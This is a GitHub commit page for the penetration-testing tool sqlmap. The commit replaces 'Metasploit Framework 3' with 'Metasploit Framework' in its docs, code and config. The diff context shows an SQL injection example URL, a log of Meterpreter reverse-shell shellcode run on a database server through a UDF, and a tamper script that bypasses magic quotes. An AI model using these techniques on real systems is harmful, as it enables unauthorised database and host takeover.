Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit f890b29

Browse files
committed
Proper reference to Metasploit Framework as now it's version 4, not 3 anymore
1 parent 4fb6dab commit f890b29

10 files changed

Lines changed: 106 additions & 105 deletions

File tree

doc/FAQ.pdf

0 Bytes
Binary file not shown.

doc/README.html

Lines changed: 81 additions & 81 deletions
Large diffs are not rendered by default.

doc/README.pdf

220 Bytes
Binary file not shown.

doc/README.sgml

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -101,7 +101,7 @@ Assume that:
101101

102102
<tscreen><tt>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1</tt></tscreen>
103103

104-
is the same page as the original one and (the condition evaluates to <bf>True<bf>):
104+
is the same page as the original one and (the condition evaluates to <bf>True</bf>):
105105

106106
<tscreen><tt>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2</tt></tscreen>
107107

@@ -923,7 +923,7 @@ Options:
923923
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
924924
--os-bof Stored procedure buffer overflow exploitation
925925
--priv-esc Database process' user privilege escalation
926-
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
926+
--msf-path=MSFPATH Local path where Metasploit Framework is installed
927927
--tmp-path=TMPPATH Remote absolute path of temporary files directory
928928

929929
Windows registry access:
@@ -2854,7 +2854,7 @@ operating system?
28542854
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
28552855
[2] Stand-alone payload stager (file system way)
28562856
>
2857-
[hh:mm:35] [INFO] creating Metasploit Framework 3 multi-stage shellcode
2857+
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
28582858
which connection type do you want to use?
28592859
[1] Reverse TCP: Connect back from the database host to this machine (default)
28602860
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
@@ -2869,7 +2869,7 @@ which payload do you want to use?
28692869
[3] VNC
28702870
>
28712871
[hh:mm:40] [INFO] creation in progress ... done
2872-
[hh:mm:43] [INFO] running Metasploit Framework 3 command line interface locally, please wait..
2872+
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
28732873

28742874
_
28752875
| | o
@@ -2891,7 +2891,7 @@ LPORT => 60641
28912891
LHOST => 192.168.136.1
28922892
[*] Started reverse handler on 192.168.136.1:60641
28932893
[*] Starting the payload handler...
2894-
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
2894+
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
28952895
please wait..
28962896
[*] Sending stage (749056 bytes) to 192.168.136.129
28972897
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11

doc/THANKS

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -504,7 +504,7 @@ Kazim Bugra Tombul <[email protected]>
504504
for reporting a minor bug
505505

506506
Efrain Torres <[email protected]>
507-
for helping me out to improve the Metasploit Framework 3 sqlmap
507+
for helping me out to improve the Metasploit Framework sqlmap
508508
auxiliary module and for commiting it on the Metasploit official
509509
subversion repository
510510
for his great Metasploit WMAP Framework
@@ -694,7 +694,7 @@ AthCon Conference team <[email protected]>
694694
Slides: http://goo.gl/QMfjO
695695

696696
Metasploit Framework development team <[email protected]>
697-
for their powerful tool Metasploit Framework 3, used by sqlmap, among
697+
for their powerful tool Metasploit Framework, used by sqlmap, among
698698
others things, to create the shellcode and establish an out-of-band
699699
connection between sqlmap and the database server
700700
Homepage: http://www.metasploit.com

lib/core/option.py

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -608,13 +608,13 @@ def __setMetasploit():
608608
break
609609

610610
if condition:
611-
debugMsg = "provided Metasploit Framework 3 path "
611+
debugMsg = "provided Metasploit Framework path "
612612
debugMsg += "'%s' is valid" % conf.msfPath
613613
logger.debug(debugMsg)
614614

615615
msfEnvPathExists = True
616616
else:
617-
warnMsg = "the provided Metasploit Framework 3 path "
617+
warnMsg = "the provided Metasploit Framework path "
618618
warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
619619
warnMsg += "be that the path does not exists or that one "
620620
warnMsg += "or more of the needed Metasploit executables "
@@ -623,11 +623,11 @@ def __setMetasploit():
623623
logger.warn(warnMsg)
624624
else:
625625
warnMsg = "you did not provide the local path where Metasploit "
626-
warnMsg += "Framework 3 is installed"
626+
warnMsg += "Framework is installed"
627627
logger.warn(warnMsg)
628628

629629
if not msfEnvPathExists:
630-
warnMsg = "sqlmap is going to look for Metasploit Framework 3 "
630+
warnMsg = "sqlmap is going to look for Metasploit Framework "
631631
warnMsg += "installation into the environment paths"
632632
logger.warn(warnMsg)
633633

@@ -647,7 +647,7 @@ def __setMetasploit():
647647
condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))
648648

649649
if condition:
650-
infoMsg = "Metasploit Framework 3 has been found "
650+
infoMsg = "Metasploit Framework has been found "
651651
infoMsg += "installed in the '%s' path" % envPath
652652
logger.info(infoMsg)
653653

@@ -657,7 +657,7 @@ def __setMetasploit():
657657
break
658658

659659
if not msfEnvPathExists:
660-
errMsg = "unable to locate Metasploit Framework 3 installation. "
660+
errMsg = "unable to locate Metasploit Framework installation. "
661661
errMsg += "Get it from http://metasploit.com/framework/download/"
662662
raise sqlmapFilePathException, errMsg
663663

lib/parse/cmdline.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -421,7 +421,7 @@ def cmdLineParser():
421421
help="Database process' user privilege escalation")
422422

423423
takeover.add_option("--msf-path", dest="msfPath",
424-
help="Local path where Metasploit Framework 3 "
424+
help="Local path where Metasploit Framework "
425425
"is installed")
426426

427427
takeover.add_option("--tmp-path", dest="tmpPath",

lib/takeover/metasploit.py

Lines changed: 8 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -368,7 +368,7 @@ def __forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
368368
def __runMsfCliSmbrelay(self):
369369
self.__forgeMsfCliCmdForSmbrelay()
370370

371-
infoMsg = "running Metasploit Framework 3 command line "
371+
infoMsg = "running Metasploit Framework command line "
372372
infoMsg += "interface locally, please wait.."
373373
logger.info(infoMsg)
374374

@@ -378,22 +378,22 @@ def __runMsfCliSmbrelay(self):
378378
def __runMsfCli(self, exitfunc):
379379
self.__forgeMsfCliCmd(exitfunc)
380380

381-
infoMsg = "running Metasploit Framework 3 command line "
381+
infoMsg = "running Metasploit Framework command line "
382382
infoMsg += "interface locally, please wait.."
383383
logger.info(infoMsg)
384384

385385
logger.debug("executing local command: %s" % self.__cliCmd)
386386
self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
387387

388388
def __runMsfShellcodeRemote(self):
389-
infoMsg = "running Metasploit Framework 3 shellcode "
389+
infoMsg = "running Metasploit Framework shellcode "
390390
infoMsg += "remotely via UDF 'sys_bineval', please wait.."
391391
logger.info(infoMsg)
392392

393393
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
394394

395395
def __runMsfShellcodeRemoteViaSexec(self):
396-
infoMsg = "running Metasploit Framework 3 shellcode remotely "
396+
infoMsg = "running Metasploit Framework shellcode remotely "
397397
infoMsg += "via shellcodeexec, please wait.."
398398
logger.info(infoMsg)
399399

@@ -495,7 +495,7 @@ def __controlMsfCmd(self, proc, func):
495495
return returncode
496496

497497
def createMsfShellcode(self, exitfunc, format, extra, encode):
498-
infoMsg = "creating Metasploit Framework 3 multi-stage shellcode "
498+
infoMsg = "creating Metasploit Framework multi-stage shellcode "
499499
logger.info(infoMsg)
500500

501501
self.__randStr = randomStr(lowercase=True)
@@ -574,7 +574,7 @@ def pwn(self, goUdf=False):
574574
if self.connectionStr.startswith("bind"):
575575
func()
576576

577-
debugMsg = "Metasploit Framework 3 command line interface exited "
577+
debugMsg = "Metasploit Framework command line interface exited "
578578
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
579579
logger.debug(debugMsg)
580580

@@ -593,7 +593,7 @@ def smb(self):
593593
else:
594594
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
595595

596-
debugMsg = "Metasploit Framework 3 console exited with return "
596+
debugMsg = "Metasploit Framework console exited with return "
597597
debugMsg += "code %s" % self.__controlMsfCmd(self.__msfCliProc, self.uncPathRequest)
598598
logger.debug(debugMsg)
599599

@@ -603,6 +603,6 @@ def bof(self):
603603
if self.connectionStr.startswith("bind"):
604604
self.spHeapOverflow()
605605

606-
debugMsg = "Metasploit Framework 3 command line interface exited "
606+
debugMsg = "Metasploit Framework command line interface exited "
607607
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow)
608608
logger.debug(debugMsg)

sqlmap.conf

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -471,7 +471,7 @@ osBof = False
471471
# payload to be Meterpreter.
472472
privEsc = False
473473

474-
# Local path where Metasploit Framework 3 is installed.
474+
# Local path where Metasploit Framework is installed.
475475
# Valid: file system path
476476
msfPath =
477477

tamper/unmagicquotes.py

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,8 @@ def dependencies():
2222

2323
def tamper(payload):
2424
"""
25-
Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
25+
Replaces quote character (') with a multi-byte combo %bf%27 together with
26+
generic comment at the end (to make it work)
2627
2728
Example:
2829
* Input: 1' AND 1=1

0 commit comments

Comments
 (0)